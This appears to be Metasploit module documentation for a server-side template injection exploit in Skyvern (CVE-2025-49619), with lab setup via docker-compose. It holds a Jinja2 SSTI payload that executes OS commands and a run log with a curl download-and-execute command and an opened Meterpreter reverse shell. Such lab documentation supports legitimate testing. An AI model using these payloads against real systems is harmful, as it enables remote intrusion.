## Vulnerable Application

Skyvern is a browser-based automation tool that integrates AI and LLMs.
It allows users to create workflows that perform automation tasks driven by LLMs.
Versions up to and including 0.1.84 are vulnerable to server-side template injection (SSTI), which can lead to remote code execution (CVE-2025-49619).
The application is available [here](https://github.com/Skyvern-AI/skyvern.git).
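
The underlying issue is that attacker-controlled workflow input is evaluated by a server-side template engine. As a generic illustration of this class of bug (this is not Skyvern's code, and the Metasploit module's actual payload differs), a Jinja2 SSTI can escalate from template rendering to OS command execution roughly like this:

```python
# Generic Jinja2 SSTI demonstration -- NOT Skyvern code.
# If untrusted input is rendered as a template, template expressions can
# walk from Jinja2's default globals to Python's os module.
from jinja2 import Template

# Hypothetical attacker-supplied workflow parameter
malicious = "{{ cycler.__init__.__globals__.os.popen('id').read() }}"

# Rendering the untrusted value directly as a template executes `id`
# and returns its output, i.e. arbitrary command execution.
print(Template(malicious).render())
```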

### Installation

1. `git clone https://github.com/Skyvern-AI/skyvern.git`
2. `cd skyvern`
3. `mv .env.example .env`
4. `mv skyvern-frontend/.env.example skyvern-frontend/.env`
5. Replace the contents of `docker-compose.yml` with the following configuration:
```yaml
services:
  postgres:
    image: postgres:14-alpine
    restart: always
    # comment out if you want to externally connect DB
    ports:
      - 5432:5432
    volumes:
      - ./postgres-data:/var/lib/postgresql/data
    environment:
      - PGDATA=/var/lib/postgresql/data/pgdata
      - POSTGRES_USER=skyvern
      - POSTGRES_PASSWORD=skyvern
      - POSTGRES_DB=skyvern
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -U skyvern"]
      interval: 5s
      timeout: 5s
      retries: 5
  skyvern:
    image: public.ecr.aws/skyvern/skyvern:v0.1.84
    restart: on-failure
    env_file:
      - .env
    # comment out if you want to externally call skyvern API
    ports:
      - 8000:8000
      - 9222:9222 # for cdp browser forwarding
    volumes:
      - ./artifacts:/data/artifacts
      - ./videos:/data/videos
      - ./har:/data/har
      - ./log:/data/log
      - ./.streamlit:/app/.streamlit
      # Uncomment the following two lines if you want to connect to any local changes
      # - ./skyvern:/app/skyvern
      # - ./alembic:/app/alembic
    environment:
      - DATABASE_STRING=postgresql+psycopg://skyvern:skyvern@postgres:5432/skyvern
      - BROWSER_TYPE=chromium-headful
      - ENABLE_CODE_BLOCK=true
      # - BROWSER_TYPE=cdp-connect
      # Use this command to start Chrome with remote debugging:
      # "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\chrome-cdp-profile" --no-first-run --no-default-browser-check
      # /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --user-data-dir="/Users/yourusername/chrome-cdp-profile" --no-first-run --no-default-browser-check
      # - BROWSER_REMOTE_DEBUGGING_URL=http://host.docker.internal:9222/
      # =========================
      # LLM Settings - Recommended to use skyvern CLI, `skyvern init llm` to setup your LLM's
      # =========================
      # OpenAI Support:
      # If you want to use OpenAI as your LLM provider, uncomment the following lines and fill in your OpenAI API key.
      # - ENABLE_OPENAI=true
      # - LLM_KEY=OPENAI_GPT4O
      # - OPENAI_API_KEY=<your_openai_key>
      # Gemini Support:
      # Gemini is a new LLM provider that is currently in beta. You can use it by uncommenting the following lines and filling in your Gemini API key.
      # - LLM_KEY=GEMINI
      # - ENABLE_GEMINI=true
      # - GEMINI_API_KEY=YOUR_GEMINI_KEY
      # - LLM_KEY=GEMINI_2.5_PRO_PREVIEW_03_25
      # If you want to use other LLM provider, like azure and anthropic:
      # - ENABLE_ANTHROPIC=true
      # - LLM_KEY=ANTHROPIC_CLAUDE3.5_SONNET
      # - ANTHROPIC_API_KEY=<your_anthropic_key>
      # Microsoft Azure OpenAI support:
      # If you'd like to use Microsoft Azure OpenAI as your managed LLM service integration with Skyvern, use the environment variables below.
      # In your Microsoft Azure subscription, you will need to provision the OpenAI service and deploy a model, in order to utilize it.
      # 1. Login to the Azure Portal
      # 2. Create an Azure Resource Group
      # 3. Create an OpenAI resource in the Resource Group (choose a region and pricing tier)
      # 4. From the OpenAI resource's Overview page, open the "Azure AI Foundry" portal (click the "Explore Azure AI Foundry Portal" button)
      # 5. In Azure AI Foundry, click "Shared Resources" --> "Deployments"
      # 6. Click "Deploy Model" --> "Deploy Base Model" --> select a model (specify this model "Deployment Name" value for the AZURE_DEPLOYMENT variable below)
      # - ENABLE_AZURE=true
      # - LLM_KEY=AZURE_OPENAI # Leave this value static, don't change it
      # - AZURE_DEPLOYMENT=<your_azure_deployment> # Use the OpenAI model "Deployment Name" that you deployed, using the steps above
      # - AZURE_API_KEY=<your_azure_api_key> # Copy and paste Key1 or Key2 from the OpenAI resource in Azure Portal
      # - AZURE_API_BASE=<your_azure_api_base> # Copy and paste the "Endpoint" from the OpenAI resource in Azure Portal (eg. https://xyzxyzxyz.openai.azure.com/)
      # - AZURE_API_VERSION=<your_azure_api_version> # Specify a valid Azure OpenAI data-plane API version (eg. 2024-08-01-preview) Docs: https://learn.microsoft.com/en-us/azure/ai-services/openai/reference
      # Amazon Bedrock Support:
      # Amazon Bedrock is a managed service that enables you to invoke LLMs and bill them through your AWS account.
      # To use Amazon Bedrock as the LLM provider for Skyvern, specify the following environment variables.
      # 1. In the AWS IAM console, create a new AWS IAM User (name it whatever you want)
      # 2. Assign the "AmazonBedrockFullAccess" policy to the user
      # 3. Generate an IAM Access Key under the IAM User's Security Credentials tab
      # 4. In the Amazon Bedrock console, go to "Model Access"
      # 5. Click Modify Model Access button
      # 6. Enable "Claude 3.5 Sonnet v2" and save changes
      # - ENABLE_BEDROCK=true
      # - LLM_KEY=BEDROCK_ANTHROPIC_CLAUDE3.5_SONNET # This is the Claude 3.5 Sonnet "V2" model. Change to BEDROCK_ANTHROPIC_CLAUDE3.5_SONNET_V1 for the non-v2 version.
      # - AWS_REGION=us-west-2 # Replace this with a different AWS region, if you desire
      # - AWS_ACCESS_KEY_ID=FILL_ME_IN_PLEASE
      # - AWS_SECRET_ACCESS_KEY=FILL_ME_IN_PLEASE
      # Ollama Support:
      # Ollama is a local LLM provider that can be used to run models locally on your machine.
      # - LLM_KEY=OLLAMA
      # - ENABLE_OLLAMA=true
      # - OLLAMA_MODEL=qwen2.5:7b-instruct
      # - OLLAMA_SERVER_URL=http://host.docker.internal:11434
      # Open Router Support:
      # - ENABLE_OPENROUTER=true
      # - LLM_KEY=OPENROUTER
      # - OPENROUTER_API_KEY=<your_openrouter_api_key>
      # - OPENROUTER_MODEL=mistralai/mistral-small-3.1-24b-instruct
      # Groq Support:
      # - ENABLE_GROQ=true
      # - LLM_KEY=GROQ
      # - GROQ_API_KEY=<your_groq_api_key>
      # - GROQ_MODEL=llama-3.1-8b-instant

      # Maximum tokens to use: (only set for OpenRouter and Ollama)
      # - LLM_CONFIG_MAX_TOKENS=128000

      # Bitwarden Settings
      # If you are looking to integrate Skyvern with a password manager (eg Bitwarden), you can use the following environment variables.
      # - BITWARDEN_SERVER=http://localhost # OPTIONAL IF YOU ARE SELF HOSTING BITWARDEN
      # - BITWARDEN_SERVER_PORT=8002 # OPTIONAL IF YOU ARE SELF HOSTING BITWARDEN
      # - BITWARDEN_CLIENT_ID=FILL_ME_IN_PLEASE
      # - BITWARDEN_CLIENT_SECRET=FILL_ME_IN_PLEASE
      # - BITWARDEN_MASTER_PASSWORD=FILL_ME_IN_PLEASE

      # 1Password Integration
      # If you are looking to integrate Skyvern with 1Password, you can use the following environment variables.
      # OP_SERVICE_ACCOUNT_TOKEN=""
    depends_on:
      postgres:
        condition: service_healthy
    healthcheck:
      test: ["CMD", "test", "-f", "/app/.streamlit/secrets.toml"]
      interval: 5s
      timeout: 5s
      retries: 5
  skyvern-ui:
    image: public.ecr.aws/skyvern/skyvern-ui:latest
    restart: on-failure
    ports:
      - 8080:8080
      - 9090:9090
    volumes:
      - ./artifacts:/data/artifacts
      - ./videos:/data/videos
      - ./har:/data/har
      - ./.streamlit:/app/.streamlit
    env_file:
      - skyvern-frontend/.env
    environment: {}
      # - VITE_ENABLE_CODE_BLOCK=true
      # if you want to run skyvern on a remote server,
      # you need to change the host in VITE_WSS_BASE_URL and VITE_API_BASE_URL to match your server ip
      # If you're self-hosting this behind a dns, you'll want to set:
      #   A route for the API: api.yourdomain.com -> localhost:8000
      #   A route for the UI: yourdomain.com -> localhost:8080
      #   A route for the artifact API: artifact.yourdomain.com -> localhost:9090 (maybe not needed)
      # - VITE_WSS_BASE_URL=ws://localhost:8000/api/v1
      # - VITE_ARTIFACT_API_BASE_URL=http://localhost:9090
      # - VITE_API_BASE_URL=http://localhost:8000/api/v1
      # - VITE_SKYVERN_API_KEY=<get this from "settings" in the Skyvern UI>
    depends_on:
      skyvern:
        condition: service_healthy
```
6. `docker-compose up`
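
Once `docker-compose up` has brought the stack up, it can be worth confirming that the API and UI are reachable before moving on. Below is a minimal reachability sketch, assuming the default port mappings from the compose file above; the `/docs` path (FastAPI's interactive documentation) is an assumption and may differ between releases.

```python
# Quick reachability check for the Skyvern stack started above.
# Port mappings are taken from the compose file; the endpoint paths
# are assumptions and may vary between Skyvern releases.
import requests

targets = {
    "API": "http://localhost:8000/docs",  # assumed FastAPI docs endpoint
    "UI": "http://localhost:8080/",
}

for name, url in targets.items():
    try:
        resp = requests.get(url, timeout=5)
        print(f"{name}: {url} -> HTTP {resp.status_code}")
    except requests.RequestException as exc:
        print(f"{name}: {url} -> unreachable ({exc})")
```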

## Verification Steps

1. Install the application
2. Start `msfconsole`
3. Do: `use linux/http/skyvern_ssti_cve_2025_49619`
4. Set `RHOSTS`, `RPORT`, `LHOST`, and `LPORT`
5. Do: `set API_KEY [skyvern API key]`
6. Do: `run`
7. You should get a shell.

## Options

### API_KEY

Skyvern uses an API key to authenticate requests to its API and manage the application.
The key is required to view, create, and modify workflows, and can be obtained from the Skyvern web UI.
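
For reference, the key is sent as an HTTP header on requests to the Skyvern API. The sketch below checks that a key is accepted by listing workflows; the `x-api-key` header name and the `/api/v1/workflows` path are assumptions here and may differ between releases.

```python
# Illustrative check that a Skyvern API key is accepted.
# Header name and endpoint path are assumptions and may vary by version.
import requests

SKYVERN_URL = "http://localhost:8000"       # assumed local Docker install
API_KEY = "<skyvern API key from the UI>"   # copied from the Skyvern UI settings

resp = requests.get(
    f"{SKYVERN_URL}/api/v1/workflows",
    headers={"x-api-key": API_KEY},
    timeout=10,
)
print(resp.status_code)  # 200 suggests the key is valid; 401/403 means it is not
```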

## Scenarios

Versions <= 0.1.84 are vulnerable. Example run against the Docker installation described above:

```
msf6 exploit(linux/http/skyvern_ssti_cve_2025_49619) > run verbose=true
[*] Command to run on remote host: curl -so ./SFDHeJURLqF http://192.168.168.183:8080/YtbemzlkZg8l1wkKWmIdEg;chmod +x ./SFDHeJURLqF;./SFDHeJURLqF&
[*] Fetch handler listening on 192.168.168.183:8080
[*] HTTP server started
[*] Adding resource /YtbemzlkZg8l1wkKWmIdEg
[*] Started reverse TCP handler on 192.168.168.183:4444
[*] Client 192.168.168.146 requested /YtbemzlkZg8l1wkKWmIdEg
[*] Sending payload to 192.168.168.146 (curl/7.88.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.168.146
[*] Meterpreter session 1 opened (192.168.168.183:4444 -> 192.168.168.146:48480) at 2025-06-23 10:04:13 +0200

meterpreter > sysinfo
Computer     : 172.18.0.3
OS           : Debian 12.10 (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```